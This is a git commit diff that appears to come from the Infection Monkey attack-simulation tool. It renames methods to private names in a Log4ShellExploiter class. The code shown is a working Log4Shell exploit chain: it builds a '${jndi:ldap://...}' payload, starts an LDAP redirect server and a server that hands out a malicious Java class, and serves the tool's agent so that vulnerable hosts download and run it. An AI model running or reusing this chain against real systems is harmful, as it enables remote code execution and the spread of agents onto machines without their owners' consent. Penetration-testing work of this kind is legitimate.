Agent: Prefix private methods/variables with _ in Log4ShellExploiter

2022-01-12 12:23:44 -05:00 · 2022-01-12 12:23:44 -05:00 · 3bbf4f9ac6
parent 8f53a5ccd0
commit 3bbf4f9ac6
1 changed files with 42 additions and 42 deletions
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -38,69 +38,69 @@ class Log4ShellExploiter(WebRCE):
    def __init__(self, host: VictimHost):
        super().__init__(host)

-        self.ldap_port = get_free_tcp_port()
+        self._ldap_port = get_free_tcp_port()

-        self.class_http_server_ip = get_interface_to_target(self.host.ip_addr)
+        self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
        self.class_http_server_port = get_free_tcp_port()

-        self.ldap_server = None
-        self.ldap_server_thread = None
-        self.exploit_class_http_server = None
-        self.exploit_class_http_server_thread = None
-        self.agent_http_server_thread = None
+        self._ldap_server = None
+        self._ldap_server_thread = None
+        self._exploit_class_http_server = None
+        self._exploit_class_http_server_thread = None
+        self._agent_http_server_thread = None

    def _exploit_host(self):
-        self.start_servers()
+        self._start_servers()
        try:
            return self.exploit(None, None)
        finally:
-            self.stop_servers()
+            self._stop_servers()

-    def start_servers(self):
+    def _start_servers(self):
        # Start http server, to serve agent to victims
        paths = self.get_monkey_paths()
-        agent_http_path = self.start_agent_http_server(paths)
+        agent_http_path = self._start_agent_http_server(paths)

        # Build agent execution command
-        command = self.build_command(paths["dest_path"], agent_http_path)
+        command = self._build_command(paths["dest_path"], agent_http_path)

        # Start http server to serve malicious java class to victim
-        self.start_class_http_server(command)
+        self._start_class_http_server(command)

        # Start ldap server to redirect ldap query to java class server
-        self.start_ldap_server()
+        self._start_ldap_server()

-    def start_agent_http_server(self, agent_paths: dict) -> str:
+    def _start_agent_http_server(self, agent_paths: dict) -> str:
        # Create server for http download and wait for it's startup.
        http_path, http_thread = HTTPTools.create_locked_transfer(
            self.host, agent_paths["src_path"]
        )
-        self.agent_http_server_thread = http_thread
+        self._agent_http_server_thread = http_thread
        if not http_path:
            logger.debug("Exploiter failed, couldn't start an http server to serve agent.")
            raise Exception("Http server creation failed")
        logger.info("Started http server on %s", http_path)
        return http_path

-    def start_class_http_server(self, command: str):
-        java_class = self.build_java_class(command)
+    def _start_class_http_server(self, command: str):
+        java_class = self._build_java_class(command)

-        self.exploit_class_http_server = ExploitClassHTTPServer(
-            self.class_http_server_ip, self.class_http_server_port, java_class
+        self._exploit_class_http_server = ExploitClassHTTPServer(
+            self._class_http_server_ip, self.class_http_server_port, java_class
        )
        # Setting `daemon=True` to save ourselves some trouble when this is merged to the
        # agent-refactor branch.
        # TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
        # constructor directly after merging to the agent-refactor branch.
-        self.exploit_class_http_server_thread = Thread(
-            target=self.exploit_class_http_server.run, daemon=True
+        self._exploit_class_http_server_thread = Thread(
+            target=self._exploit_class_http_server.run, daemon=True
        )
-        self.exploit_class_http_server_thread.start()
+        self._exploit_class_http_server_thread.start()

-    def start_ldap_server(self):
-        self.ldap_server = LDAPExploitServer(
-            ldap_server_port=self.ldap_port,
-            http_server_ip=self.class_http_server_ip,
+    def _start_ldap_server(self):
+        self._ldap_server = LDAPExploitServer(
+            ldap_server_port=self._ldap_port,
+            http_server_ip=self._class_http_server_ip,
            http_server_port=self.class_http_server_port,
            storage_dir=get_monkey_dir_path(),
        )
@ -109,26 +109,26 @@ class Log4ShellExploiter(WebRCE):
        # agent-refactor branch.
        # TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
        # constructor directly after merging to the agent-refactor branch.
-        self.ldap_server_thread = Thread(target=self.ldap_server.run, daemon=True)
-        self.ldap_server_thread.start()
+        self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
+        self._ldap_server_thread.start()

-    def stop_servers(self):
+    def _stop_servers(self):
        logger.debug("Stopping all LDAP and HTTP Servers")
-        self.agent_http_server_thread.stop()
-        self.agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+        self._agent_http_server_thread.stop()
+        self._agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)

-        self.exploit_class_http_server.stop()
-        self.exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+        self._exploit_class_http_server.stop()
+        self._exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)

-        self.ldap_server.stop()
-        self.ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
+        self._ldap_server.stop()
+        self._ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)

-    def build_ldap_payload(self):
+    def _build_ldap_payload(self):
        interface_ip = get_interface_to_target(self.host.ip_addr)
-        return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
+        return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"

    # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
-    def build_command(self, path, http_path):
+    def _build_command(self, path, http_path):
        # Build command to execute
        monkey_cmd = build_monkey_commandline(
            self.host, get_monkey_depth() - 1, vulnerable_port=None
@ -145,7 +145,7 @@ class Log4ShellExploiter(WebRCE):
            "parameters": monkey_cmd,
        }

-    def build_java_class(self, exploit_command: str) -> bytes:
+    def _build_java_class(self, exploit_command: str) -> bytes:
        if "linux" in self.host.os["type"]:
            return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
        else:
@ -159,12 +159,12 @@ class Log4ShellExploiter(WebRCE):
        ]
        for exploit in get_log4shell_service_exploiters():
            for port in open_ports:
-                exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
+                exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)

                # Wait for request
                sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)

-                if self.exploit_class_http_server.exploit_class_downloaded():
+                if self._exploit_class_http_server.exploit_class_downloaded():
                    self.exploit_info["vulnerable_service"] = {
                        "service_name": exploit.service_name,
                        "port": port,